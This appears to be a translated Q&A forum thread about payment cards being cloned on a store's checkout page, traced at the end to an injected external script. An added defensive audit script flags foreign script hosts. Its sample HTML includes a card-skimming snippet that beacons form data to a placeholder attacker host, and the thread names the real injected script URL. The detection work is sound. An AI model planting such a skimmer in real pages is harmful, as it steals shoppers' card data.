How can you clone cards on my website?


Viewed 235 times

5

What is happening is the following. I am currently trying to solve a big problem: two of the company's online stores that I look after are having a problem with card cloning. I don't have much experience in this, but I will explain how the card system works today.

1) The customer enters the card details in the shopping cart.
2) An AJAX call sends this information to a file, which processes the payment and returns the result.

The shops:

  • Use SSL.
  • Save nothing related to the card in the database.
  • The server says it has no virus.

What actions can I take to try to solve this? In terms of programming.

  • Do any employees have access to this information? Have you checked the access log on the server to see if someone is getting in and capturing something?

  • No one has access; the information is not recorded anywhere.

  • And there's no way they could have gotten the information "in transit" during validation... Like a bot that waits for the event to run and grabs what is in the script, something like that?

  • That is also my question. How can I avoid this? What treatment should I use? How can I find out if this is it?

  • When the guy registers on your site, is his credit card not recorded even then? Will he have to type the card number for every purchase he makes?

  • 1

    How would this bot break SSL security?

  • Nothing is saved. Every time you have to type everything in again.

  • 1

    Does the ajax that sends the data to the .asp also send the data over SSL?

  • Yeah, does your $.ajax() have something like url: 'https://blablabla.com/blablabla'?

  • Yes, it has the url, or at least it is possible to identify it by inspecting. How do I resolve this?

  • If the url your ajax sends to the .asp uses SSL, things don't smell right to me :-(

  • I did not get to look at it; it may be that the destination url, the one that receives the post and processes the payment data, does not use SSL.

  • But is there https in the url?

  • The ajax is sending the post to the file, for example: payment_card.asp. It does not have the full url in the ajax call.

  • 1

    There was an injection of this javascript in the system database, https://cdn.rawgit.com/0shrk/web/master/p.js ; it is foreign to the store's functionality, it must have been this.


2 answers

4

Come on, based on the information from your comments: we are on the outside with no access to the logs, no access to the server, and no access to your code, so we can only guess where the problem is happening.

 - They use SSL.

If all communications use SSL, the problem dies here... When I say all communications I mean that your site should do all communication between browser (client) and your server via https:. Another point is whether your ajax sends the data to the .asp over SSL. If the answer is yes, it would be very difficult for someone to intercept (sniff, spoof) the communication between browser (client) and server (Nginx, Apache, IIS, etc.); it would also be very difficult to forge the SSL to try to take the data in the clear...

If the data sent between your ajax and the .asp is not encrypted, any sniffer or ARP spoofer running on the network where your server sits can read this information. The same happens on the network where you are receiving the data, in your case the network where the .asp is. In both cases you are a hostage: you have no control over either network, so sit and cry, or make sure that everything is encrypted.

- They save nothing related to the card in the database.

If you guarantee that nothing is saved anywhere, forget about database intrusion problems and SQL injection.

 - The server said it has no virus.

This is very vague; the problem may well be occurring here. It can be the server or a vulnerability in your code. It is of no use for everything to be encrypted via SSL if your server is compromised: some open FTP port, an open SSH port, something that can be exploited and allow full access to the server. That would let the attacker change code in a hidden way and send the forms to his server/PC/database... The same can happen with your PHP/ASP code: if there are any holes in it, the attacker can insert hidden code into your server without you noticing anything.

Imagine that the hacker finds a way to access your server; he can achieve this by exploiting HTTP/SSH/FTP, exploits, loopholes in code (PHP, ASP), etc. Imagine I am on the form typing my credit card number. OK, the data is encrypted via SSL once I hit Submit, and in theory no one could read the transaction, but the data in the form served from the server side is not encrypted, so someone could insert something in the code that saves or sends this data...

  - What actions can I take to try to solve this? In terms of
    programming

Not knowing for sure where the problem is :-(

  • Read about this case https://blog.sucuri.net/portugues/2017/09/security -de-ecommerce-jquery-falso-rouba-credit cards.html

  • @Marcosxavier yes, exactly; it is only possible to insert something in the code if the server is compromised in some way. This is what I wrote about in the penultimate and last paragraphs :-(

  • Exactly, the linked post has some suggestions. I believe it is one of the first steps for you to audit and resolve the failure. Check the possibility of javascript injection; it is an assumption, since I do not know how the system is designed.
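The answer above and the comments on the question both come down to the same check: is there a script on the checkout page, whether an include or inline code, that talks to a host the store does not own? As an added example, not code from the question or from either answer, here is a small Node.js audit that runs that check over page HTML exported from the database. The store hostname, the allowlist, and the sample HTML (including the evil.example beacon) are constructed for the demonstration; the one injected URL is the one reported in the comments.

```javascript
// Added example (not from the question or either answer): audit stored page
// HTML for script includes and inline code that talk to hosts the store does
// not own. Node.js, no dependencies. Everything below the allowlist is
// constructed sample data; the one injected URL is the one the comments report.

// Assumption: the store's own host and the third-party script hosts it
// legitimately uses.
const PAGE_HOST = "www.example-store.com";
const ALLOWED_SCRIPT_HOSTS = new Set([PAGE_HOST, "code.jquery.com"]);

// Constructed sample: a checkout template as it might sit in the CMS database
// after an attacker with write access has added one script include and one
// inline submit handler. evil.example is a placeholder, not a real endpoint.
const SAMPLE_HTML = `
<html><head>
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<script src="/js/cart.js"></script>
<script src="https://cdn.rawgit.com/0shrk/web/master/p.js"></script>
</head><body>
<form id="payment"><input name="card_number"><input name="cvv"></form>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var d = new FormData(this);
  navigator.sendBeacon('https://evil.example/c', JSON.stringify([...d]));
});
</script>
</body></html>`;

// Resolve a (possibly relative) URL against the page and return its hostname,
// or null if it cannot be parsed at all.
function hostOf(url, pageHost) {
  try {
    return new URL(url, "https://" + pageHost + "/").hostname;
  } catch (e) {
    return null;
  }
}

// Walk every <script> in the HTML. External includes are judged by their src
// host; inline scripts are judged by any absolute URL they contain, since an
// exfiltration snippet has to name the host it sends the form data to.
function auditHtml(html, pageHost, allowedHosts) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (src) {
      const host = hostOf(src[1], pageHost);
      if (host === null || !allowedHosts.has(host)) {
        findings.push({ kind: "external-script", host: host, url: src[1] });
      }
      continue;
    }
    const urlRe = /https?:\/\/[^\s"'`<>)]+/gi;
    let u;
    while ((u = urlRe.exec(body)) !== null) {
      const host = hostOf(u[0], pageHost);
      if (host === null || !allowedHosts.has(host)) {
        findings.push({ kind: "inline-beacon", host: host, url: u[0] });
      }
    }
  }
  return findings;
}

// Stand-alone run: print what the audit flags in the constructed sample.
if (typeof require !== "undefined" && require.main === module) {
  for (const f of auditHtml(SAMPLE_HTML, PAGE_HOST, ALLOWED_SCRIPT_HOSTS)) {
    console.log(f.kind + ": " + f.host + " (" + f.url + ")");
  }
}
```

Run it over the templates and content rows exported from the store database rather than over the live page, since that is where the comments say the injection was found. The same allowlist, served as a Content-Security-Policy header with a script-src directive, makes the browser refuse any script host not on the list on every page load, which catches a re-injection before a human does.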

1


Are you using an anti-forgery token (AntiForgeryToken)?

It may be that when paying for the shopping cart, instead of clicking once, the customer is double-clicking the Pay button.

If this is happening and you do not use the token, the payment will be processed more than once.

If you validate tokens of this type, once the user has POSTed the payment <FORM> and used a token, that token will no longer be valid, and new attempts to use it, which is what would happen if he pressed the button countless times, will fail.

To use Antiforgerytoken, simply decorate the controller method with:

using System.Web.Mvc;

public class PagamentoController : Controller
{
    // Reject the POST unless it carries the anti-forgery token issued with the form
    [ValidateAntiForgeryToken]
    [HttpPost]
    public ActionResult Pagar(PagamentoModel model)
    {
        ....
        return View();
    }
}
  • 5

    Marcelão, no offense, ok, but just to give you a heads-up. Don't you think the comment field would be more suitable for your questioning? It is not correct to use the answer field to ask questions about the question....

  • 1

    OK, thanks, later, cheers

  • Marcelo, no, I don't think that would cause the problem of the card being cloned. The problem is that those who buy in the stores have their card cloned. However, nothing about the card is saved in the database.

  • How did you know that the card(s) were cloned? If there is a record of this cloning, perhaps it would be easier to understand. Did you receive payment two or more times on the same card? If so, then it costs nothing to check how the user operated his shopping cart.

  • 1

    No, the problem is that those who buy on my sites complain that later someone tried to buy with their card on other sites (other stores), and this started to get very frequent. After shopping in my stores, there are attempts to shop in other places that the card owner does not recognize.

  • 2

    Have you checked whether you are using JS from hosts other than yours? It may be that some JS of yours, or some CDN that hosts your JS, is vulnerable?

  • No, I'm not using any.

  • 1

    Hello everyone, it was just this: @Marcelouchimura found, very hidden in the database, an injection of this javascript, which is foreign to the system. https://cdn.rawgit.com/0shrk/web/master/p.js I believe this is it.

  • Okay, @Andersonnunes, thanks for the reply. Please do an overview of the site for SQL Injection vulnerabilities.

